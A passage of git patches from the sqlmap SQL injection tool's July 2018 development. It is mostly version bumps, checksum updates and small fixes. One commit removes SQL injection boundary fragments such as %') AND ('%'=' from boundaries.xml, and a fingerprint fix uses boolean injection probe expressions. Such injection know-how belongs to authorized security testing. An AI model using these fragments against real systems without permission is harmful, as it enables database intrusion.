lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.7.9" +VERSION = "1.2.7.10" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/utils/hash.py b/lib/utils/hash.py index 6487ba25a0c..f92f19bd038 100644 --- a/lib/utils/hash.py +++ b/lib/utils/hash.py @@ -7,7 +7,7 @@ try: from crypt import crypt -except ImportError: +except: # removed ImportError because of https://github.com/sqlmapproject/sqlmap/issues/3171 from thirdparty.fcrypt.fcrypt import crypt _multiprocessing = None diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 1aa07e715ac..93f7d99b504 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -4c026aa83372dded4cb70cbdb677fb81 lib/core/settings.py +f140b81ca26a2eb0e071cb6837352d28 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 95f04c1c1d8c3998d86e1bdf0e12771c lib/core/target.py @@ -107,7 +107,7 @@ de9620f03231d8329ee8434884b6bacd lib/utils/deps.py f7af65aa47329d021e2b2cc8521b42a4 lib/utils/getch.py 7af29f61302c8693cd6436d4b69e22d3 lib/utils/har.py 062e4e8fc43ac54305a75ddd0d482f81 lib/utils/hashdb.py -cc1cfe36057f1d9bbdcba1bcc03359f9 lib/utils/hash.py +4d5b2262ad495301706a4cf4c565abec lib/utils/hash.py 011d2dbf589e0faa0deca61a651239cc lib/utils/htmlentities.py 1e5532ede194ac9c083891c2f02bca93 lib/utils/__init__.py 010d8327239d33af4ce9f25683cfc012 lib/utils/pivotdumptable.py From 53eadb0af80d96ede2b3e109aec3994661b0a01f Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 9 Jul 2018 12:22:51 +0200 Subject: [PATCH 202/428] Fixes #3173 --- lib/core/settings.py | 2 +- plugins/dbms/postgresql/fingerprint.py | 4 ++-- txt/checksum.md5 | 4 ++-- 3 files changed, 5 insertions(+), 5 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index c4144f9020b..9b8340d19e4 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.7.10" +VERSION = "1.2.7.11" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/plugins/dbms/postgresql/fingerprint.py b/plugins/dbms/postgresql/fingerprint.py index a9a50633f94..0e577de4e4a 100644 --- a/plugins/dbms/postgresql/fingerprint.py +++ b/plugins/dbms/postgresql/fingerprint.py @@ -100,9 +100,9 @@ def checkDbms(self): if inject.checkBooleanExpression("XMLTABLE(NULL) IS NULL"): Backend.setVersion(">= 10.0") elif inject.checkBooleanExpression("SIND(0)=0"): - Backend.setVersion(">= 9.6.0", "< 10.0") + Backend.setVersionList([">= 9.6.0", "< 10.0"]) elif inject.checkBooleanExpression("TO_JSONB(1) IS NOT NULL"): - Backend.setVersion(">= 9.5.0", "< 9.6.0") + Backend.setVersionList([">= 9.5.0", "< 9.6.0"]) elif inject.checkBooleanExpression("JSON_TYPEOF(NULL) IS NULL"): Backend.setVersionList([">= 9.4.0", "< 9.5.0"]) elif inject.checkBooleanExpression("ARRAY_REPLACE(NULL,1,1) IS NULL"): diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 93f7d99b504..09890837e70 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -f140b81ca26a2eb0e071cb6837352d28 lib/core/settings.py +048446ac83a95b7b5d017366bcf4485d lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 95f04c1c1d8c3998d86e1bdf0e12771c lib/core/target.py @@ -185,7 +185,7 @@ bcdbd9c04d7d5a911e0e31abe1a24f0f plugins/dbms/oracle/takeover.py f99c23db4ee6a6b8c0edbf684d360ad3 plugins/dbms/postgresql/connector.py 7cdb821884e5f15084d1bea7f8a50574 plugins/dbms/postgresql/enumeration.py c8bb829d45752b98e6a03817b92e0fe5 plugins/dbms/postgresql/filesystem.py -29560cf78211888802c6e5c8681e7d71 plugins/dbms/postgresql/fingerprint.py +d30806e39996e6d273f0af888f5710a4 plugins/dbms/postgresql/fingerprint.py 470860d3e85d11a67f2220bffaa415e7 plugins/dbms/postgresql/__init__.py 20e6f48f496348be45f3402ebc265dbb plugins/dbms/postgresql/syntax.py 1287acf330da86a93c8e64aff46e3b65 plugins/dbms/postgresql/takeover.py From 29dcdd3befac5674bf7a19902ad1194f89015f4a Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 10 Jul 2018 15:35:07 +0200 Subject: [PATCH 203/428] Potential patch for #3178 --- lib/core/common.py | 2 +- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index f060039e6c9..8d866cefda6 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -2334,7 +2334,7 @@ def getUnicode(value, encoding=None, noneToNull=False): try: return unicode(value, UNICODE_ENCODING) except: - value = value[:ex.start] + "".join(INVALID_UNICODE_CHAR_FORMAT % ord(_) for _ in value[ex.start:ex.end]) + value[ex.end:] + value = getUnicode(value[:ex.start], UNICODE_ENCODING) + u"".join(INVALID_UNICODE_CHAR_FORMAT % ord(_) for _ in value[ex.start:ex.end]) + getUnicode(value[ex.end:], UNICODE_ENCODING) elif isListLike(value): value = list(getUnicode(_, encoding, noneToNull) for _ in value) return value diff --git a/lib/core/settings.py b/lib/core/settings.py index 9b8340d19e4..9e178cc5ca3 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.7.11" +VERSION = "1.2.7.12" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 09890837e70..9bfa4046fe6 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -28,7 +28,7 @@ c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py 0adf547455a76dc71e6a599e52da1ed9 lib/core/agent.py fd8f239e259afaf5f24bcf34a0ad187f lib/core/bigarray.py -ab2f7ecb7d3dff9afd05675031942e8e lib/core/common.py +63472d70c4cc55b7a48ae4109e8feac3 lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py @@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -048446ac83a95b7b5d017366bcf4485d lib/core/settings.py +30b23e73b463c1026467930e0b2aa763 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 95f04c1c1d8c3998d86e1bdf0e12771c lib/core/target.py From 5cc36a57361f0d808e7b22016c19c5e05efa57df Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 10 Jul 2018 15:54:06 +0200 Subject: [PATCH 204/428] Revert of last commit (Fixes #3179) --- lib/core/common.py | 2 +- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index 8d866cefda6..f060039e6c9 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -2334,7 +2334,7 @@ def getUnicode(value, encoding=None, noneToNull=False): try: return unicode(value, UNICODE_ENCODING) except: - value = getUnicode(value[:ex.start], UNICODE_ENCODING) + u"".join(INVALID_UNICODE_CHAR_FORMAT % ord(_) for _ in value[ex.start:ex.end]) + getUnicode(value[ex.end:], UNICODE_ENCODING) + value = value[:ex.start] + "".join(INVALID_UNICODE_CHAR_FORMAT % ord(_) for _ in value[ex.start:ex.end]) + value[ex.end:] elif isListLike(value): value = list(getUnicode(_, encoding, noneToNull) for _ in value) return value diff --git a/lib/core/settings.py b/lib/core/settings.py index 9e178cc5ca3..bd142423bd3 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.7.12" +VERSION = "1.2.7.13" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 9bfa4046fe6..3c50cc32945 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -28,7 +28,7 @@ c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py 0adf547455a76dc71e6a599e52da1ed9 lib/core/agent.py fd8f239e259afaf5f24bcf34a0ad187f lib/core/bigarray.py -63472d70c4cc55b7a48ae4109e8feac3 lib/core/common.py +ab2f7ecb7d3dff9afd05675031942e8e lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py @@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -30b23e73b463c1026467930e0b2aa763 lib/core/settings.py +2f2c4fe68780abcae94f5b4ea7650387 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 95f04c1c1d8c3998d86e1bdf0e12771c lib/core/target.py From 3c439c3929b5625b85f2db670e3f20386eacbf0e Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 11 Jul 2018 16:12:57 +0200 Subject: [PATCH 205/428] Known cause of majority of false-positives (Issue #3176) --- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 +-- xml/boundaries.xml | 72 -------------------------------------------- 3 files changed, 3 insertions(+), 75 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index bd142423bd3..6f13d38cfc9 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.7.13" +VERSION = "1.2.7.14" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 3c50cc32945..81db47e4e10 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -2f2c4fe68780abcae94f5b4ea7650387 lib/core/settings.py +2c474df57ac9d142f8747701b70082a5 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 95f04c1c1d8c3998d86e1bdf0e12771c lib/core/target.py @@ -465,7 +465,7 @@ d48c971769c6131e35bd52d2315a8d58 xml/banner/servlet-engine.xml d989813ee377252bca2103cea524c06b xml/banner/sharepoint.xml 350605448f049cd982554123a75f11e1 xml/banner/x-aspnet-version.xml 817078783e1edaa492773d3b34d8eef0 xml/banner/x-powered-by.xml -fb93505ef0ab3b4a20900f3e5625260d xml/boundaries.xml +201b8bb7888f500294a9831bb47ce7a7 xml/boundaries.xml 0d0d4bd0e06c99dd8eb4f92acc25caf3 xml/errors.xml a279656ea3fcb85c727249b02f828383 xml/livetests.xml 3318571fac8df058f19ea85780606643 xml/payloads/boolean_blind.xml diff --git a/xml/boundaries.xml b/xml/boundaries.xml index b4fa0b71072..497edda8677 100644 --- a/xml/boundaries.xml +++ b/xml/boundaries.xml @@ -293,78 +293,6 @@ Formats: AND "[RANDSTR]" LIKE "[RANDSTR] - - 2 - 1 - 1,2 - 2 - %') - AND ('%'=' - - - - 3 - 1 - 1,2 - 2 - %')) - AND (('%'=' - - - - 4 - 1 - 1,2 - 2 - %'))) - AND ((('%'=' - - - - 1 - 1 - 1,2 - 2 - %' - AND '%'=' - - - - 4 - 1 - 1,2 - 2 - %") - AND ("%"=" - - - - 5 - 1 - 1,2 - 2 - %")) - AND (("%"=" - - - - 5 - 1 - 1,2 - 2 - %"))) - AND ((("%"=" - - - - 3 - 1 - 1,2 - 2 - %" - AND "%"=" - - 1 1 From 4846d85ccd885a77980438d9b38d475aeb6e91e3 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 11 Jul 2018 19:30:14 +0200 Subject: [PATCH 206/428] Pre-fetching latest revision number in case of update --- lib/core/common.py | 16 ++++++++++++++++ lib/core/settings.py | 2 +- lib/core/update.py | 6 ++++++ txt/checksum.md5 | 6 +++--- 4 files changed, 26 insertions(+), 4 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index f060039e6c9..eb28e355c63 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -3347,6 +3347,22 @@ def unhandledExceptionMessage(): return errMsg +def getLatestRevision(): + """ + Retrieves latest revision from the offical repository + """ + + retVal = None + req = urllib2.Request(url="https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/lib/core/settings.py") + + try: + content = urllib2.urlopen(req).read() + retVal = extractRegexResult(r"VERSION\s*=\s*[\"'](?P[\d.]+)", content) + except: + pass + + return retVal + def createGithubIssue(errMsg, excMsg): """ Automatically create a Github issue with unhandled exception information diff --git a/lib/core/settings.py b/lib/core/settings.py index 6f13d38cfc9..74e88c05652 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.7.14" +VERSION = "1.2.7.15" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/core/update.py b/lib/core/update.py index b9a54e54998..e027024e399 100644 --- a/lib/core/update.py +++ b/lib/core/update.py @@ -17,6 +17,7 @@ from lib.core.common import dataToStdout from lib.core.common import getSafeExString +from lib.core.common import getLatestRevision from lib.core.common import pollProcess from lib.core.common import readInput from lib.core.data import conf @@ -25,6 +26,7 @@ from lib.core.revision import getRevisionNumber from lib.core.settings import GIT_REPOSITORY from lib.core.settings import IS_WIN +from lib.core.settings import VERSION from lib.core.settings import ZIPBALL_PAGE from lib.core.settings import UNICODE_ENCODING @@ -39,6 +41,10 @@ def update(): warnMsg += "from GitHub (e.g. 'git clone --depth 1 %s sqlmap')" % GIT_REPOSITORY logger.warn(warnMsg) + if VERSION == getLatestRevision(): + logger.info("already at the latest revision '%s'" % getRevisionNumber()) + return + message = "do you want to try to fetch the latest 'zipball' from repository and extract it (experimental) ? [y/N]" if readInput(message, default='N', boolean=True): directory = os.path.abspath(paths.SQLMAP_ROOT_PATH) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 81db47e4e10..c3b4fe4e97c 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -28,7 +28,7 @@ c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py 0adf547455a76dc71e6a599e52da1ed9 lib/core/agent.py fd8f239e259afaf5f24bcf34a0ad187f lib/core/bigarray.py -ab2f7ecb7d3dff9afd05675031942e8e lib/core/common.py +5e498b6dd232bca7c698699cf5ceec03 lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py @@ -48,14 +48,14 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -2c474df57ac9d142f8747701b70082a5 lib/core/settings.py +5d09048bf6682159e784d762a2772137 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 95f04c1c1d8c3998d86e1bdf0e12771c lib/core/target.py 72d499ca8d792e90a1ebfb2ad2341a51 lib/core/testing.py de9922a29c71a235cb95a916ff925db2 lib/core/threads.py c40758411bb0bd68764d78e0bb72bd0f lib/core/unescaper.py -9d395b143be295a143eb5c9b926f3569 lib/core/update.py +b35636650cfe721f5cc47fb91737c061 lib/core/update.py e772deb63270375e685fa5a7b775c382 lib/core/wordlist.py 1e5532ede194ac9c083891c2f02bca93 lib/__init__.py 7620f1f4b8791e13c7184c06b5421754 lib/parse/banner.py From a4796550973f00422784a9e4a3ec1569773a275d Mon Sep 17 00:00:00 2001 From: Anastasios Stasinopoulos Date: Sun, 15 Jul 2018 12:28:34 +0300 Subject: [PATCH 207/428] Minor patch (--purge instead of --purge-output) (#3188) --- lib/parse/cmdline.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py index 062f52c6f3a..ab2fbe8ebb8 100644 --- a/lib/parse/cmdline.py +++ b/lib/parse/cmdline.py @@ -875,7 +875,7 @@ def _(self, *args): args.url = args.url or DUMMY_URL if not any((args.direct, args.url, args.logFile, args.bulkFile, args.googleDork, args.configFile, args.requestFile, args.updateAll, args.smokeTest, args.liveTest, args.wizard, args.dependencies, args.purge, args.sitemapUrl)): - errMsg = "missing a mandatory option (-d, -u, -l, -m, -r, -g, -c, -x, --wizard, --update, --purge-output or --dependencies), " + errMsg = "missing a mandatory option (-d, -u, -l, -m, -r, -g, -c, -x, --wizard, --update, --purge or --dependencies), " errMsg += "use -h for basic or -hh for advanced help\n" parser.error(errMsg) From 741ce9e3f0a736934615d09d936ad700add8897b Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Sun, 15 Jul 2018 16:08:01 +0200 Subject: [PATCH 208/428] Trivial update (just to reset checksums) --- lib/core/common.py | 2 +- lib/core/settings.py | 2 +- txt/checksum.md5 | 6 +++--- 3 files changed, 5 insertions(+), 5 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index eb28e355c63..48af95c4f75 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -3764,7 +3764,7 @@ def __init__(self): logger.debug(debugMsg) else: found = sorted(options.keys(), key=lambda x: len(x))[0] - warnMsg = "detected ambiguity (mnemonic '%s' can be resolved to: %s). " % (name, ", ".join("'%s'" % key for key in options.keys())) + warnMsg = "detected ambiguity (mnemonic '%s' can be resolved to any of: %s). " % (name, ", ".join("'%s'" % key for key in options.keys())) warnMsg += "Resolved to shortest of those ('%s')" % found logger.warn(warnMsg) diff --git a/lib/core/settings.py b/lib/core/settings.py index 74e88c05652..643cfe6a019 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.7.15" +VERSION = "1.2.7.16" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index c3b4fe4e97c..a7533dd1cf7 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -28,7 +28,7 @@ c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py 0adf547455a76dc71e6a599e52da1ed9 lib/core/agent.py fd8f239e259afaf5f24bcf34a0ad187f lib/core/bigarray.py -5e498b6dd232bca7c698699cf5ceec03 lib/core/common.py +b703bb5160945067a36c6827c34e1624 lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py @@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -5d09048bf6682159e784d762a2772137 lib/core/settings.py +c2887e721f068a7f5060c70662b70809 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 95f04c1c1d8c3998d86e1bdf0e12771c lib/core/target.py @@ -59,7 +59,7 @@ b35636650cfe721f5cc47fb91737c061 lib/core/update.py e772deb63270375e685fa5a7b775c382 lib/core/wordlist.py 1e5532ede194ac9c083891c2f02bca93 lib/__init__.py 7620f1f4b8791e13c7184c06b5421754 lib/parse/banner.py -3dd11b8be62e15a9d54cf5f08c603ffc lib/parse/cmdline.py +bc34167c7accc61df07b2982cddd0338 lib/parse/cmdline.py fb2e2f05dde98caeac6ccf3e67192177 lib/parse/configfile.py 3794ff139869f5ae8e81cfdbe5714f56 lib/parse/handler.py 6bab53ea9d75bc9bb8169d3e8f3f149f lib/parse/headers.py From 6bb486c1bffe94663142308334f644809bc3f1da Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 18 Jul 2018 15:34:38 +0200 Subject: [PATCH 209/428] Potential patch for #3192 --- lib/core/settings.py | 2 +- lib/core/target.py | 2 ++ txt/checksum.md5 | 4 ++-- 3 files changed, 5 insertions(+), 3 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 643cfe6a019..34763d9d5ba 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.7.16" +VERSION = "1.2.7.17" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/core/target.py b/lib/core/target.py index c20adfb8faa..bceafe5c86c 100644 --- a/lib/core/target.py +++ b/lib/core/target.py @@ -671,6 +671,8 @@ def _createTargetDirs(): conf.outputPath = tempDir + conf.outputPath = getUnicode(conf.outputPath) + try: with codecs.open(os.path.join(conf.outputPath, "target.txt"), "w+", UNICODE_ENCODING) as f: f.write(kb.originalUrls.get(conf.url) or conf.url or conf.hostname) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index a7533dd1cf7..54ffa406c26 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -48,10 +48,10 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -c2887e721f068a7f5060c70662b70809 lib/core/settings.py +44a45f6e35fa61d620c82b71a72ecbde lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py -95f04c1c1d8c3998d86e1bdf0e12771c lib/core/target.py +12bed9603b6fba3e5ffda11d584bc449 lib/core/target.py 72d499ca8d792e90a1ebfb2ad2341a51 lib/core/testing.py de9922a29c71a235cb95a916ff925db2 lib/core/threads.py c40758411bb0bd68764d78e0bb72bd0f lib/core/unescaper.py From 9f2bc0042691da409523e0aae1accfa440897421 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 18 Jul 2018 16:30:59 +0200 Subject: [PATCH 210/428] Minor patch --- lib/core/settings.py | 2 +- lib/core/threads.py | 1 + txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 3 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 34763d9d5ba..bcb8cb18b61 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.7.17" +VERSION = "1.2.7.18" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/core/threads.py b/lib/core/threads.py index c1e05cb14a1..a0bf58e3738 100644 --- a/lib/core/threads.py +++ b/lib/core/threads.py @@ -168,6 +168,7 @@ def runThreads(numThreads, threadFunction, cleanupFunction=None, forwardExceptio except (KeyboardInterrupt, SqlmapUserQuitException), ex: print + kb.prependFlag = False kb.threadContinue = False kb.threadException = True diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 54ffa406c26..c936dc4bb88 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -48,12 +48,12 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -44a45f6e35fa61d620c82b71a72ecbde lib/core/settings.py +4c4a8178e4fd6e1fa8225c8c08815cd0 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 12bed9603b6fba3e5ffda11d584bc449 lib/core/target.py 72d499ca8d792e90a1ebfb2ad2341a51 lib/core/testing.py -de9922a29c71a235cb95a916ff925db2 lib/core/threads.py +e896992e4db26605ab1e73615b1f9434 lib/core/threads.py c40758411bb0bd68764d78e0bb72bd0f lib/core/unescaper.py b35636650cfe721f5cc47fb91737c061 lib/core/update.py e772deb63270375e685fa5a7b775c382 lib/core/wordlist.py From a0cbf6991d92c24a37e8fb106ce8bb1e7a3f00c8 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 18 Jul 2018 17:00:34 +0200 Subject: [PATCH 211/428] Minor style update --- lib/core/settings.py | 2 +- thirdparty/ansistrm/ansistrm.py | 15 +++++++++++++-- txt/checksum.md5 | 4 ++-- 3 files changed, 16 insertions(+), 5 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index bcb8cb18b61..dcad0b64c87 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.7.18" +VERSION = "1.2.7.19" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/thirdparty/ansistrm/ansistrm.py 